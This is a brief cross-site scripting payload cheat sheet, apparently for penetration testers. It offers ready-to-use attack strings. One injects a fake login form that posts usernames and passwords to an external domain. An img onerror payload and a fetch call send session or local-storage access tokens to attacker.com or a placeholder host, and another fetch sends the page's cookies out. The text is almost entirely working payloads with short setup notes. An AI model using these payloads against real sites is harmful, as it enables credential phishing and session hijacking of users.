Cross-Site Scripting Inspirations

Injection of a Login Page:

This creates a fake login form - Change <URL> parameter to your collaborator/externally facing domain.

<form action="https://<URL>/POC" method="post"><label for="username">Username:</label><input type="text" id="username" name="username" required><br><br><label for="password">Password:</label><input type="password" id="password" name="password" required><br><br><button type="button" style="height:40px;font-size:13pt;">Login</button></form>

Session Highjacking - Stealing Local/Session Storage

This payload steals a session token from the Session Storage but can also be stolen from Local Storage using JavaScript. The Payload below, steals the session storage (variable is named access_token, change to suit your needs) and sending it to the collaborator via a GET request. Be sure to exchange <URL> to your collaborator/externally facing domain.

<img src="1" onerror="var xhr= new XMLHttpRequest(); xhr.open('GET', 'https://<URL>?token='+window.sessionStorage.getItem('access_token')); xhr.send();" />

Important that mode: 'no-cors' is added within the request - Steals access_token from Local Storage and sends it to collaborator.

fetch('https://attacker.com', {
  method: 'POST',
  mode: 'no-cors',
  body:localStorage.getItem('access_token')
});

Session Hijacking - Steling Cookies

Stealing cookies (such as session cookie) is a simple JavaScript payload. Change <DOMAIN> to your collaborator

fetch(`https://<DOMAIN>/?cookies=${encodeURIComponent(document.cookie)}`)